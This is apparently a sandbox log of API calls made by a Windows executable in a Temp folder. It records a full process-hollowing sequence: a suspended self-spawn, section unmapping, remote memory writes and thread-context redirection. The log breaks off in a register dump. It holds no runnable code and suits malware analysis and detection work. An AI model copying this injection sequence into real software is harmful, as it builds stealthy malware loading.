[0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.878] GetLastError () returned 0x0 [0146.878] SetLastError (dwErrCode=0x0) [0146.879] GetLastError () returned 0x0 [0146.879] SetLastError (dwErrCode=0x0) [0146.879] GetLastError () returned 0x0 [0146.879] SetLastError (dwErrCode=0x0) [0146.879] GetLastError () returned 0x0 [0146.879] SetLastError (dwErrCode=0x0) [0146.879] GetLastError () returned 0x0 [0146.879] SetLastError (dwErrCode=0x0) [0146.879] GetLastError () returned 0x0 [0147.377] LoadLibraryA (lpLibFileName="msimg32.dll") returned 0x6fa30000 [0147.397] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0147.397] GetProcAddress (hModule=0x76720000, lpProcName="GlobalAlloc") returned 0x76739950 [0147.397] GetProcAddress (hModule=0x76720000, lpProcName="GetLastError") returned 0x76733870 [0147.397] GetProcAddress (hModule=0x76720000, lpProcName="Sleep") returned 0x76737990 [0147.397] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0147.397] GetProcAddress (hModule=0x76720000, lpProcName="CreateToolhelp32Snapshot") returned 0x76747b50 [0147.398] GetProcAddress (hModule=0x76720000, lpProcName="Module32First") returned 0x767644b0 [0147.398] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0147.398] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0xb8 [0147.443] Module32First (hSnapshot=0xb8, lpme=0x19db48) returned 1 [0147.446] VirtualAlloc (lpAddress=0x0, dwSize=0x293a0, flAllocationType=0x1000, flProtect=0x40) returned 0x550000 [0147.454] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0147.454] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0 [0147.454] GetProcAddress (hModule=0x743d0000, lpProcName="GetMessageExtraInfo") returned 0x74403690 [0147.454] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0147.454] GetProcAddress (hModule=0x76720000, lpProcName="WinExec") returned 0x7675ff70 [0147.454] GetProcAddress (hModule=0x76720000, lpProcName="CreateFileA") returned 0x76746880 [0147.454] GetProcAddress (hModule=0x76720000, lpProcName="WriteFile") returned 0x76746ca0 [0147.455] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0147.455] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessA") returned 0x76760750 [0147.455] GetProcAddress (hModule=0x76720000, lpProcName="GetThreadContext") returned 0x7673ec60 [0147.455] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0147.455] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAllocEx") returned 0x76762730 [0147.455] GetProcAddress (hModule=0x76720000, lpProcName="VirtualFree") returned 0x76737600 [0147.455] GetProcAddress (hModule=0x76720000, lpProcName="ReadProcessMemory") returned 0x76761c80 [0147.455] GetProcAddress (hModule=0x76720000, lpProcName="WriteProcessMemory") returned 0x76762850 [0147.455] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadContext") returned 0x76762490 [0147.455] GetProcAddress (hModule=0x76720000, lpProcName="ResumeThread") returned 0x7673a800 [0147.455] GetProcAddress (hModule=0x76720000, lpProcName="WaitForSingleObject") returned 0x76746820 [0147.455] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleFileNameA") returned 0x7673a720 [0147.455] GetProcAddress (hModule=0x76720000, lpProcName="GetCommandLineA") returned 0x7673ab60 [0147.455] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x771d0000 [0147.456] GetProcAddress (hModule=0x771d0000, lpProcName="NtUnmapViewOfSection") returned 0x77246f40 [0147.456] GetProcAddress (hModule=0x771d0000, lpProcName="NtWriteVirtualMemory") returned 0x77247040 [0147.456] GetProcAddress (hModule=0x743d0000, lpProcName="RegisterClassExA") returned 0x74404e90 [0147.456] GetProcAddress (hModule=0x743d0000, lpProcName="CreateWindowExA") returned 0x74406f30 [0147.456] GetProcAddress (hModule=0x743d0000, lpProcName="PostMessageA") returned 0x743ff0e0 [0147.456] GetProcAddress (hModule=0x743d0000, lpProcName="GetMessageA") returned 0x743fe130 [0147.457] GetProcAddress (hModule=0x743d0000, lpProcName="DefWindowProcA") returned 0x7725aed0 [0147.457] GetProcAddress (hModule=0x76720000, lpProcName="GetFileAttributesA") returned 0x76746a20 [0147.457] GetProcAddress (hModule=0x76720000, lpProcName="GetStartupInfoA") returned 0x76739c10 [0147.457] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtectEx") returned 0x76762790 [0147.457] GetProcAddress (hModule=0x76720000, lpProcName="ExitProcess") returned 0x76747b30 [0147.457] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\apfhq")) returned 0xffffffff [0147.457] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\apfhq")) returned 0xffffffff [0147.457] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\apfhq")) returned 0xffffffff [0147.457] RegisterClassExA (param_1=0x19d804) returned 0xc1e1 [0147.458] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x60306 [0147.571] PostMessageA (hWnd=0x60306, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0147.571] GetMessageA (in: lpMsg=0x19d834, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19d834) returned 1 [0147.572] GetMessageA (in: lpMsg=0x19d834, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19d834) returned 1 [0147.572] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x590000 [0147.572] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x590000, nSize=0x2800 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2eae.exe")) returned 0x2d [0147.572] GetStartupInfoA (in: lpStartupInfo=0x19d758 | out: lpStartupInfo=0x19d758*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0147.572] GetCommandLineA () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" [0147.572] CreateProcessA (in: lpApplicationName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe", lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19d758*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x19d7b0 | out: lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe", lpProcessInformation=0x19d7b0*(hProcess=0x118, hThread=0x114, dwProcessId=0x14c, dwThreadId=0x5ac)) returned 1 [0147.623] VirtualFree (lpAddress=0x590000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.624] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x590000 [0147.624] GetThreadContext (in: hThread=0x114, lpContext=0x590000 | out: lpContext=0x590000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x38e000, Edx=0x0, Ecx=0x0, Eax=0x40b380, Ebp=0x0, Eip=0x77248fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0147.624] ReadProcessMemory (in: hProcess=0x118, lpBaseAddress=0x38e008, lpBuffer=0x19d7a4, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19d7a4*, lpNumberOfBytesRead=0x0) returned 1 [0147.624] NtUnmapViewOfSection (ProcessHandle=0x118, BaseAddress=0x400000) returned 0x0 [0147.628] VirtualAllocEx (hProcess=0x118, lpAddress=0x400000, dwSize=0x3d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0147.629] NtWriteVirtualMemory (in: ProcessHandle=0x118, BaseAddress=0x400000, Buffer=0x5515a0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x5515a0*, NumberOfBytesWritten=0x0) returned 0x0 [0147.634] NtWriteVirtualMemory (in: ProcessHandle=0x118, BaseAddress=0x401000, Buffer=0x5519a0*, NumberOfBytesToWrite=0x1c800, NumberOfBytesWritten=0x0 | out: Buffer=0x5519a0*, NumberOfBytesWritten=0x0) returned 0x0 [0147.645] NtWriteVirtualMemory (in: ProcessHandle=0x118, BaseAddress=0x41e000, Buffer=0x56e1a0*, NumberOfBytesToWrite=0x8600, NumberOfBytesWritten=0x0 | out: Buffer=0x56e1a0*, NumberOfBytesWritten=0x0) returned 0x0 [0147.694] NtWriteVirtualMemory (in: ProcessHandle=0x118, BaseAddress=0x427000, Buffer=0x5767a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x5767a0*, NumberOfBytesWritten=0x0) returned 0x0 [0147.751] NtWriteVirtualMemory (in: ProcessHandle=0x118, BaseAddress=0x439000, Buffer=0x5769a0*, NumberOfBytesToWrite=0x2600, NumberOfBytesWritten=0x0 | out: Buffer=0x5769a0*, NumberOfBytesWritten=0x0) returned 0x0 [0147.780] NtWriteVirtualMemory (in: ProcessHandle=0x118, BaseAddress=0x43c000, Buffer=0x578fa0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x578fa0*, NumberOfBytesWritten=0x0) returned 0x0 [0147.785] WriteProcessMemory (in: hProcess=0x118, lpBaseAddress=0x38e008, lpBuffer=0x5516a4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x5516a4*, lpNumberOfBytesWritten=0x0) returned 1 [0147.787] SetThreadContext (hThread=0x114, lpContext=0x590000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x38e000, Edx=0x0, Ecx=0x0, Eax=0x43c0b2, Ebp=0x0, Eip=0x77248fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, 